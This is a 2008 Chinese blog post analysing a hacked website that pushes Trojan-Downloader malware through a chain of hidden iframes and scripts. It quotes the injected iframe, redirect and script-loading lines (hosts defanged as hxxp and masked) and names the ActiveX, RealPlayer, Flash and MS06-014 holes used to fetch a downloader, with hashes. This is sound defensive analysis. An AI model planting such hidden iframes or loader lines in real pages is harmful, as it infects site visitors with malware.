某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

最新推荐文章于 2021-02-11 12:52:33 发布
最新推荐文章于 2021-02-11 12:52:33 发布
阅读量1.3k 收藏
点赞数
分类专栏: 系统安全 文章标签: flash iframe javascript 解密 c 游戏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2504765
版权

某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

endurer 原创
2008-06-02 第1

该网站包含代码:
/---
<iframe src=hxxp://www.m**m*e*x*e**.com/alexa.html width=0 height=0></iframe>
---/

#1 hxxp://www.m**m*e*x*e**.com/alexa.html 内容为:
/---
<script language="javascript" type="text/javascript">
window.location="hxxp://www.u**i**u**ou.net/6.htm";
</script>
---/

#1.1 hxxp://www.u**i**u**ou.net/6.htm包含代码:
/---
<iframe src=news.html width=100 height=0></iframe>
---/

#1.1.1 hxxp://www.u**i**u**ou.net/news.html

在解密过程卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Agent.byj

输出代码:
/---
<script src=hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js></script>
<EMBED src=hxxp://*fuck**.g**o-*3**6*0*.net/versionff.swf width=0 height=0>
<iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://*fuck**.g**o-*3**6*0*.net/real.js></script>
<iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/Real.html"></iframe>
<iframe width=100 height=0 src=hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html></iframe>
---/

#1.1.1.1 hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js(卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Small.lw

利用MS06-014漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/bak.css
属性 : A---
M$签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:57
修改时间 : 2008-6-2 12:13:57
大小 : 13840 字节 13.528 KB
MD5 : 7806c353c9643b85d9a7229be7273de0
SHA1: A37F4233AD1EBC1548C65B041491A7004454D413
CRC32: 2ae34afc

卡巴斯基报为 Trojan-Downloader.Win32.Small.iyq,瑞星报为 Trojan.DL.Win32.Mnless.agu

#1.1.1.2 hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html

利用联众游戏(GLIEDown.IEDown.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.3 hxxp://*fuck**.g**o-*3**6*0*.net/real.js

利用RealPlayer(IERPCtl.IERPCtl.1,clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.4 hxxp://*fuck**.g**o-*3**6*0*.net/Real.html

利用RealPlayer(IERPCtl.IERPCtl.1,clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.5 hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html
利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F
)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.6 hxxp://*fuck**.g**o-*3**6*0*.net/versionie.swf
利用Flash(ShockwaveFlash.ShockwaveFlash.9)漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/versionie.swf
属性 : A---
M$签名:否
PE文件:否
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:56
修改时间 : 2008-6-2 12:35:34
大小 : 133 字节
MD5 : e1bc4891359a7a8b4aabc837593860be
SHA1: 4A177911641401A58C22D00545A67B91EBB79E66
CRC32: 9e64316f

卡巴斯基报为:Trojan-Downloader.SWF.Small.bb

#1.1.1.7 利用 BaiduBar.Tool 下载 hxxp://*fuck**.g**o-*3**6*0*.net/Baidu.cab,内含 Baidu.exe

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
html 网页加载
11-17
<iframe src="show.asp" frameBorder="0" width="500" scrolling="no" height="230"></iframe>
intsafe.h头文件 开发资源下载 http://download.csdn.net/user/jiaao
03-30
intsafe.h头文件 开发资源下载 http://download.csdn.net/user/jiaao
遭遇trojan-downloader.win32.agent.vjh
NONAME的专栏
07-29 1417
 今天下午开始本打算学习ARCIMS的,正是因为要学习它就装软件吧,为了节约内存我把卡巴给关掉,于是惹来了trojan-downloader.win32.agent.vjh木马,真够郁闷的。现象:一旦机器启动如果卡巴随机启动,于是卡巴会提示发现病毒并要求处理,你点击处理不一会机器就自动重启了。然而卡巴还是会报告这是什么病毒。解决:自己先是去删除windows文件下东西。根本不管用。最后上网
Trojan-Downloader.Win32.Small.bdb分析
weixin_34249678的博客
11-04 146
安天实验室 CERT一、病毒标签:病毒名称: Trojan-Downloader.Win32.Small.bdb病毒类型: ***类文件 MD5: A26C81438C5920AD57FCF2C36B8AABF2公开范围: 完全公开危害等级: 3文件长度: 12,928 字节感染系统: Windows98以上版本 加壳类型: 未知壳二、病毒描述: 该病毒是*...
iFrame视频格式
mcy478643968的专栏
04-19 4140
iFrame基于工业化的H.264以及AAC音、视频标准,在保持高画质的同时又可以将文件 尺寸减小,这样便使文件的网络传输和视频文件的编辑工作效率更高。iFrame是苹果专为简化视频拍摄、处理过程而开发的新格式,其基本理念是:DV拍摄并存储的视频即为编辑软件所需格式,省去中间的转码过程,提升视频采集、编辑和共享的效率。iFrame格式规定分辨率为960x540 30fps,使用H.264编码,
Trojan-Qt5-Windows.zip
03-14
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
trojan-1.16.0-win.zip
04-01
trojan
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
trojan-qt5.app.zip
04-06
标题 "trojan-qt5.app.zip" 暗示我们正在处理一个可能包含恶意软件的压缩文件,其中的“trojan”一词通常用于指代特洛伊木马病毒。特洛伊木马是一种伪装成合法软件的恶意程序,用户在不知情的情况下下载并执行时,它...
木马下载器Trojan-Downloader.Win32.Small.nkb
04-13 2429
捕获时间2008-04-12病毒症状该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。病毒分析该木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数Crea
Gozi Trojan
04-16 3296
Author: Don Jackson Russian malware authors are finding new ways to steal and profit from data which used to be considered safe from thieves because it was encrypted using SSL/TLS. Originally, this
ARP病毒加的网址传播Trojan-Downloader.Win32.Delf.bjy
Purpleendurer@CSDN
05-19 1747
endurer 原创2007-05-19 第1版分析了一下ARP病毒“吃里巴外”?http://endurer.bokee.com/6277614.htmlhttp://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspxhttp://blog.sina.com.cn/u/49926d91010008q6中自动添加的网址
trogan连接不上_警惕!不要点开这些链接,是木马病毒!
weixin_31107269的博客
02-11 1916
原标题:警惕!不要点开这些链接,是木马病毒!2日18:00注意!各位棉湖街坊,如果大家有收到这种链接,请不要点开,是木马病毒,是电信诈骗的一种。请大家一定要提高警惕! 中木马病毒详解过程1、当点击链接以后手机看上去没有任何反应,但是后台已经开始下载木马程序并自动安装,在这个过程中,用户可能会误认为链接无效,继而不会去注意它。2、木马病毒装上去以后,卸载比较难的,有些安装的路径隐藏得比较深,让用户找...
国外的第一只[感染*.swf]flash病毒的源代码_陕南赤子_新浪博客
allen88的专栏
04-01 204
SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Masm Version 6.11: ML.EXE SWF.ASM ; Virus Size: 926 bytes ; Infection Size: 32...
TrojanDownloader简单分析
Cosmopolitan的博客
07-27 2242
这里是WinMain的入口,先读取最后自己最后160解密出要下载的url: 注册服务和写入注册表来加入自启动 没有下载过就开一个线程去下载执行 下载执行并且标记为已下载 ...
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
最新发布
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值